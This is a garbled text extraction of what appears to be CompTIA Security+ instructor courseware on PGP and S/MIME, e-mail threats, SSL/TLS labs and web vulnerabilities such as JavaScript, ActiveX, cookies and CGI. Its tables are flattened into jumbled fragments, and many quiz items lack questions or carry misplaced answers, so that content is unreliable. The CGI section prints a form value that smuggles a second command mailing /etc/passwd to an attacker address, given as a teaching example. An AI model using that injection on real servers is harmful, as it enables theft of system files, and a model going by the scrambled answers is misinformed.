Certificate X.509 version Certificate format Identifies which version of the X.509 standard applies to this certificate, which in turn determines what information can be specified in it. Public key of the certificate holder, together with an algorithm identifier that specifies which cryptosystem the key belongs to and any associated key parameters. Unique serial number to distinguish it from other certificates issued. This information is used in numerous ways; for example, when a certificate is revoked, its serial number is placed on a certificate revocation list (CRL). Intended to be unique across the Internet, a DN consists of multiple subsections and might look something like this: CN=Jonathan Public, E-MAIL=jonathanpublic@hotmail.com, OU=Security Team, O=Consulting Inc., C=US (These refer to the subjects Common Name, Organizational Unit, Organization, and Country.) Certificates validity period Unique name of the certificate issuer Start date/time and expiration date/time. Unique name of the entity that signed the certificate. This is normally a CA. Using the certificate implies trusting the entity that signed this certificate. Signature using the private key of the entity that issued the certificate. Algorithm used by the CA to sign the certificate.
S/MIME trust model: certificate authorities S/MIME was designed from the outset as a purely hierarchical model. Keys or certificates are trusted based on the trustworthiness of the issuer, which is assumed to be of a higher value than that of the user. The line of trust can be followed up the chain of certificates to some root, which is generally a large commercial organization, a certificate authority engaged purely in the business of verifying identity and assuring the validity of keys or certificates.
518
Marketplace advocates
PGP, Inc., has been dissolved, but some of its products have been absorbed into the McAffee product line Configuration is not intuitive, and certificates must be created; general use is straightforward PGP software must be downloaded and installed
Ease of use
Configuration is not intuitive, and certificates must be obtained and installed; general use is straightforward Already integrated in Microsoft and Netscape products (both commercial and free versions) Certificates must be purchased from a certificate authority, and they have a yearly fee attached
Software
Cost of certificates
E-mail
Features Key management S/MIME 3 Easy, but you must trust a certificate authority OpenPGP
519
Harder because the user must make decisions on the validity of identities, but you have granular control over whom you trust Compatible with MIME and nonMIME e-mail formats, but the recipient must have PGP installed Status of PGPs centralized management products in doubt
Compatibility
Transparently works with any vendors MIME e-mail client, but not compatible with non-MIME e-mail formats Centralized management possible through public key infrastructure (PKI) offerings
Centralized management
A single e-mail client could use both S/MIME and PGP, but PGP cannot be used to decrypt S/MIME messages and vice versa. There are many differences between an X.509 certificate and a PGP certificate, but the most important are: You can create your own PGP certificate; you must request and be issued an X.509 certificate from a certificate authority. X.509 certificates natively support only a single name for the keys owner, whereas PGP allows multiple fields to describe the keys owner. X.509 certificates support only a single digital signature to attest to the keys validity, but PGP allows the inclusion of many signatures that attest to the validity of the key.
520
Do it!
B-2:
521
To demonstrate how PGP is installed and configured to be able to encrypt and digitally sign e-mail, you will now work through the following steps: Installing and configuring PGP (including generating PGP keys) Exporting public keys Importing public keys The first step is to install and configure PGP on your workstation. PGP can be downloaded free from the International PGP Home Page (www.pgp.com/downloads/desktoptrial.html). To save you some time and protect your privacy, your instructor has already downloaded the software for you. After you've installed PGP, a wizard starts to guide you through the initial setup steps, including generating a PGP key.
Do it!
B-3:
Heres how
See the classroom setup instructions for location of the download file.
5 Click Next 6 Click Next 7 Click Yes 8 Log in as Administrator 9 Click Next 10 Enter user information in the fields provided and then click
Next Enter Student## for Name, Class for Organization and a fictional e-mail address. The file copy starts. To restart your computer. The PGP Setup Assistant starts automatically.
522
Do not have students enter the evaluation license you received with the download. If you do, all but the first student to enter and submit the license number will receive an error message when trying to license the program.
Click Next 12 Click Next 13 Click Next 14 Click Next 15 Enter Student## and a fictional Yahoo e-mail address Click Next 16 Check Show Keystrokes Enter a passphrase Reenter the passphrase 17 Click Next 18 Click Next 19 Click Next 20 Click Next 21 Click Finish
To accept the default of automatically detecting e-mail accounts. To accept the default outgoing e-mail policies. To view your keystrokes. A longer passphrase is desirable for security reasons To confirm. To generate the key. To accept the default of I am a new user. To specify that you want to generate a PGP key.
523
B-4:
Heres how
1 Launch PGP Right-click Student## 2 Choose Export...
Make sure students have removable media available on which to save the exported file.
3 Save the file to a removable media device using the default file name 4 Give the removable media to your partner 5 Insert your partner's removable media into the appropriate drive or port 6 Choose File, Import 7 Navigate to the removable media Select Student##.asc Click Open
Save the file to the removable media with which your instructor has provided you.
Due to an incompatibility between PGP and Network Monitor (which is used in the unit on transmission and storage media) in Windows Server 2003, students have to uninstall PGP when finished with activity B-4.
To start the process of uninstalling PGP. This is necessary due to an incompatibility between PGP and Network Monitor (which is used in the unit on transmission and storage media) in Windows Server 2003.
12 Follow the prompts to uninstall the program and then reboot the computer
524
Vulnerabilities
Explanation E-mail has an incredible number of vulnerabilities; moreover, because its the one electronic tool that almost everyone uses, e-mail is attacked frequently. As demonstrated so far, a large number of e-mail vulnerabilities can be addressed using a combination of best practices, virus-scanning software, and secure e-mail. The table below outlines the more common e-mail vulnerabilities and countermeasures for each:
Attack Eavesdropping Vulnerability Lack of confidentiality; because email is sent in clear text, it can be read in transit. Solution E-mail encryption for communications that require confidentiality. Encrypted messages cannot be effectively scanned for viruses until they reach the desktop and are decrypted. Spoofing and masquerading Lack of authentication; dummy email accounts can be set up to pose as trusted businesses and trick users into giving over credit card numbers and other types of information. Lack of authentication; by tricking e-mail servers to send their data through a third node, an attacker can pose as one or both people in an email exchange. Lack of integrity; because e-mail data is sent as plaintext, it can be modified or changed in transit. Digital certificates issued by a trusted certificate authority prove to the customer that the sender of an email really is who he or she says it is. By digitally signing their data, the two parties can authenticate each other and be sure of the senders identity; they also gain the same certainty by encrypting their e-mails. E-mail encryption stops both the reading and manipulation of e-mails; digital signatures on e-mails ensure that if the data is changed in transmission, the recipient will know. Virus filtering software on desktops, servers, and Internet gateways.
Data manipulation
Malware
Malicious software; viruses, Trojan horses, backdoors, and worms can spread through e-mail, destroy data, and be part of a DoS attack on email servers.
E-mail
Attack Social engineering Vulnerability Repudiation; because a variety of email attacks are possible, users can claim they did not send a given message. Solution
525
E-mail encryption and digital signatures provide nonrepudiation, because the sender must have their own digital certificate and passphrase to use them. Choose a strong passphrase for your certificate or key.
Password guessing
A wide variety of password guessing attacks can be used against a PGP key or X.509 digital certificate. Users can send sensitive company data to other untrusted networks or to untrusted parties.
Information leaks
Train users on acceptable use of email; use an e-mail content filtering solution.
Spam
Spam is defined as the act of flooding the Internet with many copies of the same message in an attempt to force the message on people who would not otherwise choose to receive it. Most spam is commercial advertising, often for dubious products and getrich-quick schemes. Spam costs the sender very little to send, as most of the costs are paid for by the recipient or the carriers, rather than by the sender. E-mail spam E-mail spam targets individual users with direct mail messages. E-mail spam lists are often created by scanning Usenet postings, stealing Internet mailing lists, or searching the Web for addresses. On top of that, it costs money for ISPs and online services to transmit spam, and these costs are transmitted directly to subscribers. One particularly nasty variant of e-mail spam is when it is sent to mailing lists (public or private e-mail discussion forums). Many mailing lists limit activity to their subscribers, spammers use automated tools to subscribe to as many mailing lists as possible so they can grab the lists of addresses, or use the mailing list as a direct target for their attacks.
526
CompTIA Security+ Certification Although one might not think of chain letters as an attack on an organization, they in fact can cause as much damage as a virus if enough people take the time to read and forward the message. First, there is the lost productivity of the people who read and forward the message. You might think, It only took me a minute to read the message; therefore, the impact must be insignificant. If you received the message, then you are likely to be one of a group of ten people who all wasted a minute to read the message. Worse, if those ten people forward the hoax onto another ten people each, then the cumulative amount of time lost is about 100 minutes. It doesnt take very long for all the minutes to add up. Exhibit 5-7 illustrates just how fast the costs can mount. There are even more costs. When a gullible user sends a message such as the Nuclear Strike hoax, as shown in Exhibit 5-8, what is the cost to your organizations reputation?
527
Exhibit 5-8: Nuclear strike hoax Its likely your companys reputation would be damaged, if not by the fact that your employees were sent on such an embarrassingly obvious hoax, then by the fact that your employees wasted the time of others with it. Finally, hoaxes that are fake warnings of viruses cause users to take a relaxing attitude toward virus warnings. When a message comes about a real and destructive virus, will your users believe it? Phishing Another scam closely related to hoaxes is phishing. This involves the perpetrator sending e-mail to users and claiming to be a well-known company. The scammer tries to get users to divulge personal information such as bank account, social security, and other personal information. Some of the more well-known companies that have been impersonated are eBay and PayPal. An example of the e-mail that you might receive can be found at www.millersmiles.co.uk/identitytheft/latest-paypal-email-hoax.htm.
The e-mail often directs you to a site that appears to be legitimate. It has the look-andfeel of the official Web site for the company they are impersonating. If you are asked for personal information, check with the company to determine whether they actually sent you the e-mail and check one of the hoax listing sites to see if it is a known scam.
528
CompTIA Security+ Certification Countermeasures for hoaxes Although there are a number of e-mail content filtering solutions that help to mitigate the effect of hoaxes and e-mail chains, the most effective and basic countermeasures are an effective security awareness campaign coupled with a good e-mail policy. Here are some guidelines: Create a policy and train users on what they should do when they receive a virus warning. Typically, the only action they should take is to update the virus definitions on their own machine. They should not forward the warning on to others. Establish that the intranet site is the only authoritative source for advice on virus warnings. Ensure that the intranet site displays virus and hoax information on the home page and is consistently updated. For example: The Nuclear Strike warning message has been declared a hoax. Anybody receiving this warning should discard it. Remember, when receiving e-mail you should never open attachments that are not expected. Inform users that if the virus warning is not listed on the intranet site, they are to forward the warning to a designated account. Check one of the sites that list hoaxes and other urban legends before acting on or forwarding a suspect e-mail. Examples of such sites include snopes.com, hoaxbusters.ciac.org/, and any of the companies that provide anti-virus software.
E-mail Do it!
529
C-1:
2 What is the best way to protect against virus attacks attached to e-mails?
Use antivirus software on workstations, servers, and Internet gateways Train users about safeguards when opening e-mail
Scanning Usenet postings Stealing internet mailing list Searching the Web for addresses All of the above
5 Hoaxes try to get users to pass a hoax along using which method below?
A B C D
Generating excitement about being involved Playing on peoples gullibility or greed Creating a sense of importance or belonging Appearing to be an authority
Create a policy and train users. Inform users to forward the warning if nothing is posted on the intranet site. Establish the Internet site as the only authoritative source for advice on virus warnings. All of the above.
C D
530
Topic B
Topic C
Review questions
1 Encryption is accomplished by taking data and passing it, along with a value, called a key, through an algorithm that makes the data completely unreadable. True or false?
True
4 The private key is used for decryption and is kept secret. The public key is used for encryption and is freely distributed to anyone who needs or wants it. True or false?
True
5 Digital certificates consist of which of the following? A The owners public key, which is used to encrypt messages to its owner. B One or more pieces of information that uniquely identify the owner (for example, a name and e-mail address). C Electronic signatures of a signee. D Digital signature of the endorser, stating that the public key actually belongs to the person in question.
E
531
128
E 256 7 What does IDEA stand for? A Internal Data Encryption Algorithm
B
C International Digital Encryption Algorithm D Internal Digital Encryption Algorithm 8 What sizes keys (in bits) does Twofish have?
A B
128 192
C 195
D
256
Message Digest v 5
B Message Digital 5 C Message Digitalization 5 D Mixed Digest Standard 5 10 How many digital signatures does X.509 support to attest to the keys validity? A 0
B
C Multiple 11 Public key encryption allows the symmetrical key to be distributed encrypted along with the __________ text.
cipher
532
CompTIA Security+ Certification 13 X.509 is the standard for digital signatures. True or false?
False: It is a standard for digital certificates.
14 Conventional encryption is normally slower than public key encryption. True or false?
False: It is actually about 1000 times faster.
15 When encrypting e-mail, ____________ encryption provides the ability to compress the message before encryption takes place.
PGP
16 The ______________ encryption algorithm is considered the industry standard encryption algorithm today.
3DES
61
protocols.
B Discuss the vulnerabilities associated with
JavaScript, buffer overflow, ActiveX, cookies, CGI, applets, SMTP relay, and how they are commonly exploited.
C Configure Internet Explorer security.
62
Transport protocols
Explanation The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are commonly used protocols for managing the security of a message transmitted across the Internet. Developed by Netscape, SSL is also supported by Microsoft and other Internet client/server developers. SSL is included as part of both the Microsoft and Netscape browsers and most Web server products. It has become the de facto standard. TLS is essentially the latest version of SSL, but it is not as widely available in browsers. The SSL/TLS protocol runs between the Transport and Application layers, as shown in Exhibit 6-1. SSL/TLS uses TCP/IP on behalf of the higher-level protocols and allows an SSL-enabled server to authenticate itself to an SSL-enabled client, the client to authenticate itself to the server, and both machines to establish an encrypted connection.
TCP/IP d l TC/IP protocol it
Review the TCP/IP networking model before explaining that SSL/TLS runs on top of TCP. SSL/TLS is encapsulated in a TCP header. Explain that SSL/TLS would be a sub-layer between the Transport layer and the Application layer protocols.
SSL/TLS
Transport Layer
TCP
UDP
Internet Layer
ICMP
Network Interface
Ethernet
PPP
Frame Relay
ATM
Web security
63
Security mechanisms
SSL/TLS uses ciphers, which enable the encryption of data between two parties, and digital certificates, which provide the authentication of the end points for end-to-end secure communication.
Ciphers
There are two encryption (cipher) types used by SSL/TLS: symmetric encryption (secret key encryption) and asymmetric encryption (public key encryption). Used alone, both ciphers have their shortcomings. Symmetric encryption can be secure only if the shared secret key is securely exchanged. It raises the problem of how to exchange a secret key across the Internet, because the reason for using encryption in the first place is due to the insecure nature of the Internet. Asymmetric encryption solves the problem of securely sharing keys over the Internet, but it requires longer processing times because of the complexity of the algorithm. SSL as well as TLS work around these limitations by using both types of ciphers, first using an asymmetric cipher to securely exchange the shared secret key and then using the secret key to transfer the data. One of the parties picks a random secret key and encrypts it with the other end point devices public key. The encrypted key is then sent to the other party where it is decrypted using the private key known only to itself. No one else can decrypt the secret key because no one else has the private key. After the secret key is identified by each end point, the parties can then use this shared key for standard key encryption, which can be performed quickly. Along with the type of cipher being used, the cipher size or strength also plays a role in secure transactions. Commonly found 40- and 56-bit Web browsers are considered to have weak encryption because these key sizes can be cracked in a short time period (approximately one week) using commonly available processing power. These weakly encrypted browsers are common because of the U.S. regulations on exportation of strong encryption. Its expected these weak browsers will become less common with the recent changes in regulations made by the U.S. government. Ciphers using 128-bit keys provide a much higher level of protection. Some SSL/TLSenabled Web servers require the browser to support 128-bit ciphers to establish a connection. Do it!
A-1:
Heres how
1 Log on as Administrator 2 Open Internet Explorer 3 Choose Help, About Internet
Explorer
To determine what key size is currently enabled on your browser. The heading called Cipher Strength specifies the key size. If you dont have 128-bit encryption, you can click on the Update Information link to the right of the Cipher Strength heading to download the 128-bit encryption software.
64
Digital certificates
Explanation Digital certificates enable authentication of the parties involved in a secure transaction. A typical certificate has the following components: The certificate issuers name The entity for which the certificate is being issued (also called the subject) The public key of the subject Time stamp Certificates are typically issued by certificate authorities (CA) that act as a trusted third party. Certificates can be considered a standard way of binding a public key to a name, verifying the identity of the parties involved. Certificates prevent users from impersonating other parties. There are two distinct types of certificate authorities that issue digital certificates: Public certificate authorities, such as VeriSign, are recognized as trusted by most Web browsers and servers. A certificate issued by a public CA is usually used when no other relation exists between two parties. Private certificate authorities are established in-house by enterprises that need to create their own closed, private certificate infrastructure.
65
A-2:
Heres how
Explain to students that Ethereal is used to examine data from a live network via an Ethernet interface, and there are four main tasks to perform in this activity.
Accept all defaults and the user agreement After the installation is complete, restart the computer 5 Log in as Administrator 6 Open C:\Security Double-click the
Ethereal-setup-0.10.12 file To install Ethereal.
Accept the license agreement and all defaults 7 Check Run Ethereal 0.10.12 and click Finish
To launch Ethereal.
66
Do it!
A-3:
Heres how
1 Launch a Web browser Go to http://www.netbank.com 2 Return to the open Ethereal Program 3 Choose Capture, Options 4 Click the pull-down Interface menu Choose the interface thats connected to your Ethernet network 5 Clear Capture packets in
Promiscuous mode
Click Start 7 Return to the browser Refresh the page thats already loaded
67
68
Do it!
A-4:
Heres how
1 Review the records in the top pane 2 Click on the first record with HTTP as the Protocol and GET as the first word of the Info field Review the information in the middle pane 3 Click on any entry in the middle pane 4 Expand Internet Protocol Locate the source and destination addresses
This shows information about the protocols used to refresh this page. You will see the equivalent data highlighted in the bottom pane. This is the actual data, coded in hexadecimal and ASCII format. In the middle pane. Record the entries below: Source: ___________________________ Destination: _______________________
5 Expand Transmission
Control Protocol
Locate the source and destination ports and the next sequence number
Record the entries below: Source: _______________________________ Destination: ___________________________ Next sequence number: __________________
6 Expand the Hypertext Transfer Protocol entry Locate the Host entry and click on it 7 Return to the top pane and review the information for several of the other HTTP packets with a destination of your local computer
The hostname is selected in the bottom pane as well. This should be readable as ASCII text. All HTTP data should be readable in the bottom pane. Make sure you select the Hypertext Transfer Protocol in the middle pane first.
Web security
69
Do it!
A-5:
Heres how
1 In the Netbank browser window, click Account Login
3 Enter your first and last names as the User ID and Password, respectively, but dont click Login 4 Return to Ethereal and choose
Capture, Start
5 In the browser, click Login When the page finishes loading with an error, stop the Ethereal Capture 6 In the Ethereal Network Analyzer window, review the first three TCP packets by clicking on them in the top pane 7 Find the following entries in the top pane and review the Secure Socket Layer content of these frames in the middle pane SSL Client Hello Server Hello Change Cipher Spec Application Data
If you're prompted by AutoComplete, specify to not offer to remember passwords, and click No.
These are the three-way handshake between your host and the server to establish the connection.
The first three entries describe the negotiation for and exchange of ciphers. The Application Data entry contains the transmission of the HTML data. Notice that you can no longer read the HTML script in the bottom pane due to the SSL encryption.
8 Close Ethereal
610
Do it!
A-6:
At the Network layer At the Physical layer Between the Data Link layer and the Network layer Between the Transport layer and the Application layer
2 What are the two encryption types used by SSL and TLS?
Asymmetric (public key) and symmetric (secret key)
Certificate issuers name Entity for whom the certificate is being issued Public key of the certificate authority Time stamp
5 Public certificate authorities are used when no other relation exists between two parties. True or false?
True
Web security
611
As an exercise, have students draw a flowchart of sorts that describes the process and the decisions that occur during the processthis should help them understand how the public and secret keys are used.
612
Viewing certificates
Explanation You can view certificates by double-clicking the padlock icon in the browser's status bar. The General tab provides general information about the certificate, such as to whom the certificate was issued, who it was issued by, and when it's valid. The Details tab provides you with more detailed information, including: Version The version of X.509 used to create the certificate. Serial Number The unique serial number for the certificate. Signature Algorithm The encryption algorithm used to create the certificates signature. Issuer The issuer of the certificate. Valid From The date from which the certificate is valid. Valid To The date after which the certificate expires. Subject Used to establish the certificate holder, which typically includes the identification and geographic information. Public Key The certificates encrypted public key. Thumbprint Algorithm The encryption algorithm used to create the certificates thumbprint. Thumbprint The encrypted thumbprint of the signature (for example, message digest). Friendly Name The descriptive name assigned to the certificate. Do it!
A-7:
Heres how
1 In your browser, return to the Netbank login page 2 Double-click the SSL icon
613
(If necessary.) To view the certificate of the CA. To close the certificate information.
614
Do it!
A-8:
Discussing HTTPS
5 The client generates a secret session key based on the _______________ sent by the server.
Priority list
6 The client encrypts a copy of the new session key it generated with the public key of the server obtained from the certificate. True or false?
True
Web security
615
JavaScript
JavaScript is a scripting language developed by Netscape to enable Web authors to design interactive sites. JavaScript code is typically embedded into an HTML document and placed somewhere between the <head> and </head> tags. The HTML tags that indicate the beginning and ending of JavaScript code are <script> and </script>. Its possible to have multiple blocks of code within an HTML page, as long as they are surrounded by the aforementioned tags. One could also make a reference to an external JavaScript code instead of inserting the actual code within the body of the HTML code. A typical example of JavaScript code within an HTML document is as follows:
<html> <head> <title>Example JavaScript</title> <script language="JavaScript"> document.writeln("Example"); </script> </head> <body> . . </body> </html>
616
CompTIA Security+ Certification Many Web browsers support the ability to download JavaScript programs with an HTML page and execute them within the browser. Such programs are often used to interact with the client or browser user and transmit information back to the Web server that provided the page. These programs can also perform tasks outside of the users control such as changing a default Web page or sending an e-mail out to a distribution list. Vulnerabilities JavaScript programs are executed based on the intended functionality and security context of the Web page with which they were downloaded. Such programs have restricted access to other resources within the browser. Security loopholes exist in certain Web browsers that permit JavaScript programs to monitor a clients (browsers) activities beyond its intended purpose. The execution of such programs and passing of information between the server and browser or client usually takes place without the knowledge of the client. Malicious JavaScript programs can even make their way through firewalls, which lack the configuration parameters to prevent such activities. Some of the documented security holes associated with JavaScript on various browsers are: Monitoring Web browsing The CERT Coordination Center unveiled JavaScript vulnerabilities that allow an attacker to monitor the browsing activities of a user even when visiting a secure (HTTPS) Web page and behind a firewall. This information includes the URL addresses of browsed pages and cookies downloaded to client machines by the visited Web servers. Reading password and other system files JavaScript implementation of Netscape versions 4.04 through 4.74 allows a JavaScript imbedded into an HTML code to read sensitive files (including system password files) and transmit them back to the owner of the page. A similar vulnerability is inherent in the Microsoft Internet Explorer 4.0-4.01. Reading browsers preferences Certain versions of Netscape allow an imbedded JavaScript to access the preferences file, which contains information such as e-mail servers, mailbox files, e-mail addresses, and even email passwords. Safeguards Many browsers provide additional patches to fix JavaScript-related vulnerabilities. These patches are typically downloadable from the vendors (such as Microsoft and Netscape) Web sites. Unless the patch is available from the browser vendor, users should disable JavaScript to avoid being victimized by such programs.
Web security
617
ActiveX
ActiveX is a loosely defined set of technologies developed by Microsoft that provides tools for linking desktop applications to WWW content. It enables self-contained software components to interact with a wide variety of applications. Certain components of ActiveX can be triggered by use of HTML scripts to provide rich Web content to clients. For instance, ActiveX technology allows users to view Word and Excel documents directly from a browser interface. MS Office applications (Microsoft Access, Excel, and PowerPoint) are examples of built-in ActiveX components. Vulnerabilities These applications utilize embedded Visual Basic code that compromises the integrity, availability, and confidentiality of a target system. Microsoft Office specifications support the integration of certain kinds of macros, written in Visual Basic (VB), into MS Office documents. An attacker could potentially embed harmful macros into these documents that could compromise a target system or information stored on that system. After embedding malicious macros into such documents, an attacker can create an HTML interface or link that references the infected file. The HTML is then distributed by e-mail to the target systems. If the receiver of the infected files is an HTML-enabled mail client, the embedded code in the referenced document is executed without the Web clients knowledge. Many mail clients provide an auto preview feature, so no action might be required on the part of the victim for this action to occur. As a result of this vulnerability, an attacker could gain access to sensitive information (passwords or other private data stored on the system), edit the registry settings of the target system, or use the target system to launch attacks on other systems, as in the case of a distributed denial-of-service attack. Safeguards Microsoft has developed certain patches to address vulnerabilities exposed by ActiveX. Unless specifically needed however, the best way to protect against such attacks is to disable ActiveX scripting altogether from the client.
618
Do it!
B-1:
2 Which of the following is true of JavaScript programs? (Choose all that apply.)
A B C D
They can be downloaded with an HTML page. They can perform tasks undetected by the user. They can pass through firewalls. They can monitor the browsing activities of a user.
3 ActiveX allows users to view MS Office documents directly from a browser interface. True or false?
True
4 An attacker could use ActiveX to embed harmful macros into MS Office documents. True or false?
True
Switch on the auto preview feature in the e-mail program. Modify the ActiveX script. Use an antivirus scanner. Disable ActiveX scripting.
Web security
619
Buffer overflows
Explanation The buffer overflow attack can be triggered by sending large amounts of data that exceed the capacity of the receiving application within a given field. When executed with precision and deliberation, such attempts might cause the application to stop performing its intended functions and force it to execute commands on behalf of the attacker. If the application under attack has sufficient (root) administrative privileges, it is possible for the attacker to take control of the entire system through the controlled application. There are two prerequisite objectives the attacker needs to accomplish to execute a successful buffer overflow attack: Place the necessary code into the programs address space The attacker uses the victims buffer to place the necessary code that executes the intended attack. This is accomplished by sending instructions (bytes) to the CPU of the target system. Direct the application to read and execute the embedded code through effective manipulation of the registers and memory of the system Most of the time, the code the attacker is looking to exploit already exists on the target system. In these types of situations, all the attacker needs to do is to modify the necessary parameters to point to the targeted section of the code. These actions are intended to corrupt the receiving buffer and alter the programs control flow to trigger the desired action. In such attacks, the attacker can gain access to a prompt, examine system-specific variables, read system directories and files, and even detect network architecture, which he or she can use to further exploit the system. This can be especially dangerous when the application is configured to have root privileges on the system. In this case, the attacker can operate as the system administrator of the Web server and its environment. Effective buffer overflow attacks are not easy to coordinate. The attacker needs to be precise enough to launch the attack using the instruction pointers so that he or she can take over the administrative privileges without crashing the system. Vulnerabilities Buffer overflow attacks often take advantage of poor application programming that does not check the size of the input field. Abundant information about the vulnerabilities is published on the Internet for the edification of vendors and hackers alike. Safeguards Careful design of the application, based on the intended response, can effectively prevent such attacks. While implementing buffers, software developers could set the program to throw away the excess data, halt all operations, or provide the user with a warning message if a buffer overflow condition presents itself. A more proactive approach would be to design the application to automatically check the size of the data that enters the buffer. System administrators should maintain current updates and patches on all software. The CERT Coordination Center (www.cert.org/current/) provides advisories on all recently discovered application vulnerabilities. They also maintain an archive of previously found vulnerabilities at www.cert.org/advisories.
620
Cookies
Cookies serve a variety of functions, from personalizing Web pages based on user preferences to keeping the state of a users shopping cart on an online store. Most Webbased authentication models are engineered to utilize cookies for verification of a users session. Cookies have been designed to enhance the browsing experience of a typical user. Cookies are stored on a users hard drive and can be accessed by a users Web browser. The files contain saved login information, your address, shopping cart status, and a host of other things that can make the Web browsing experience more convenient. In Windows 2000/Server 2003 and XP, these cookie files are stored in the Documents and Settings folder for each user of the computer (the user profile). Vulnerabilities Cookies contain tools that are easily exploited by hackers and some so-called legitimate services to provide information about users without consent. Hackers often target cookies as a means of gaining illegal access to user accounts. Cookies can also be utilized to track information, such as the browsing habits of users, which might then be sold to an advertisement company that targets the user with unwanted ads. Its extremely crucial for Web site owners to design security measures to handle Web-based cookies in order to protect their user base and the sensitive data stored on their servers. Pages that can use a servers cookies are limited to that particular server, or to a domain hosting the server. An attacker could obtain a victims cookie for a given service by generating a script that must execute within a page from that same domain or server. One can accomplish this by a process known as Error Handling Exception (EHE). An attacker can execute a code on the server that generates an error message that is returned to the user. The attacker can then exploit the insecure error notification to launch an attack on the target server. This is possible by manipulating the error messages that are returned from 404 requests (404 File Error) or from elements that are echoed back to the screen unescaped.
If students are unfamiliar with HTML coding, explain that the <A> tag is the anchor element used in hyperlinks.
Its not possible for an attacker to obtain a given cookie directly from a victims computer. The attacker must convince a user to follow a malicious hyperlink to the targeted server so the cookie can be obtained through the error handling process on the server. For example, the attacker could send an e-mail (containing a link to the server) to an HTML-enabled e-mail client. More specifically, a hacker can manufacture a hyperlink and hide the malicious script behind the desired text of the <A> tag. When the innocent user activates the link, the malicious script embedded in the link can trigger the server to send the cookie to the attacker. One of the limiting factors of this type of attack is that the user must be logged on to the service during the time the attack takes place. If, for instance, the innocent user is not logged on to his Hotmail account (HTML-enabled service), the attacker cannot use this technique to launch the attack.
621
The following policies will help protect your organization against cookie exploits: Disable the use of cookies by reviewing your browsers preferences and options. You can also specify that you be prompted before a site puts a cookie on your hard disk, so you can choose to allow or disallow the cookie. Notice that disabling cookies will make some Web pages inoperable. Do not use cookies to store sensitive information. If you must store confidential information in cookies, use SSL/TLS to prevent the information from being exploited by a hacker. Do it!
B-2:
Monitor a browsers activities. Send enough data to overfill the buffer of a given field within an application. Force an application to execute commands on behalf of the attacker. Embed malicious macros.
2 What are the prerequisites for executing a buffer overflow? (Choose all that apply.)
A
The attacker must modify the necessary parameters to point to the embedded code. The attacker must log in as the system administrator of the Web server. The attacker must launch the attack while the user is logged onto the service. The attack must place the necessary code to execute the attack in the victims buffer.
B
C D
3 A hacker can exploit cookies to gain illegal access to user accounts and track the browsing habits of users. True or false?
True
4 Hackers can only gain access to a cookie if the user logs on to the targeted service at the same time the attack takes place. True or false?
True
622
Java applets
Explanation Java applets are Internet applications (written in Java programming language) that can operate on most client hardware and software platforms. Applets are typically stored on Web servers, from which they can be downloaded onto clients when accessed for the first time. When subsequently accessing the server, the applet is already cached on the client and, therefore, can be executed with no download delay. Signed and unsigned applets Distribution of software over networks poses potential security problems because the software must pass through many intermediate devices before it reaches the users computer. Software, unless downloaded from a trusted party, poses significant risks for an individual users computer and data. The user often has no reliable way of confirming the source of downloaded software code or whether it was changed in transit over the network. Signing applets is a technique of adding a digital signature to an applet to prove that it came unaltered from a particular trusted source. The application generates a private/public key pair and obtains a certificate authenticating the signer. The application then signs the applet code. Users downloading the applet can check the signature to verify the source of the code. Signed applets can be given more privileges than ordinary applets. An unsigned applet operates subject to a set of restrictions called the sandbox model. Sandbox restrictions prevent the applet from performing certain operations on local system resources (for example, deleting files or modifying system information such as registry settings and other control panel functions). Signed applets do not have such restrictions. Unsigned applets typically display warning messages, such as the ones shown in Exhibit 6-2.
Exhibit 6-2: Unsigned applet warning message The user of the system on which the applet will be running decides what kind of access privileges should be granted to the signer of the applet. Commonly used browsers, such as Netscape and Microsoft Internet Explorer keep track of these privileges. Depending on the applets privileges, such browsers can grant access to system resources without interrupting the user. If the applet is new and has not established a trust relationship with the clients system, the browser displays a security message confirming the consent of the client, as shown in Exhibit 6-3.
Web security
623
Exhibit 6-3: Security message confirming consent Digitally signing an applet is a confirmation from the owner of the applet about its legitimate purpose. The final decision about whether the applet should have access to system resources always rest with the client. If a signed applet damages a certain system intentionally or unintentionally, the applet can be traced back to its source from its signature. Two reasons for using code signing features are: To release the application from the sandbox restrictions imposed on unsigned code To provide confirmation regarding the source of the applications code The Java Development Kit ( 1.1 and later) Security Manager is aware of signatures, and, working in conjunction with the Java key tool (which is used to sign code and specify who is trusted), grants special privileges to signed and trusted applet code.
624
CGI
The Common Gateway Interface (CGI) is a programming interface that allows Web servers to perform data manipulation and interact with users. For example, CGI scripts perform data input, and search and retrieval functions on databases. CGI was created to extend the HTTP protocol. There are typically two parts to a CGI script: an executable program on the server (the script itself), and an HTML page that feeds input to the executable. The executable can be in the form of Perl scripts, shell scripts, or compiled programs. CGI scripts can sometimes be used without user input to perform tasks such as incrementing page counters and displaying the date and time. The following steps and Exhibit 6-4 represent a typical form submission that takes place on the Internet: 1 The user/client retrieves a form (an HTML-formatted page) from a server via a browser. 2 The user fills out the form by inputting data into the required fields on his or her local machine. 3 After filling out the form, the user submits the data to the server. This typically takes place via the use of a submit button on the form. 4 The submit action performed on the clients browser identifies the corresponding program residing on the server, sends all inputted data, and ignites an execute request to the server. 5 The server executes the requested program.
Exhibit 6-4: Working of a CGI script A similar process takes place for all types of CGI execution. CGI is very efficient because all data manipulation takes place on the server, not the client. The client merely passes data to the server and receives HTML in return. This leaves the server with only the task of executing the request when issued. Vulnerabilities The interactive nature of CGI also leads to security loopholes that need to be addressed by system administrators and software developers. CGI accepts input from a page on a client system (typically an HTML page downloaded in the browser), but executes the request on the server. Allowing input from other systems to a program that runs on a local server exposes the system to potential security hazards. Because the HTML form has been transferred to the client, a malicious user can modify or add parameters to the HTML form, instructing the server to do tasks outside the intended purpose of the form.
Web security For instance, a malicious user can modify the following instruction:
625
This instruction is supposed to generate an e-mail to a system administrator with the following line:
<INPUT TYPE="radio" NAME="send_to" VALUE="systemadmin@example. com;mail malicioususer@attack.com /etc/passwd"> SystemAdmin<br >
This line then sends an e-mail containing the UNIX password file to the attacker. Using such techniques, an attacker can gain access to confidential files and systems files or install malicious programs and viruses. Safeguards It is extremely important to take precautions when running scripts on the Web server. Here are some possible precautions to take: Deploy intrusion detection systems (IDS), access list filtering and screening. Design and code applications to check the size and content of the input received from the clients. Create different user groups with different permissions and restrict access to the hierarchical file system based on those groups. Validate the security of a prewritten script before deploying it in your production environment. The biggest security risk of CGI scripts is not to the client where the Web browser resides, but to the server where the script resides. CGI scripts must be carefully scrutinized before allowing them to be placed on a Web server.
626
Do it!
B-3:
2 New applets require the consent of the client to install. True or false?
True
3 __________________ is a programming interface that allows Web servers to perform data manipulation and interact with users.
CGI
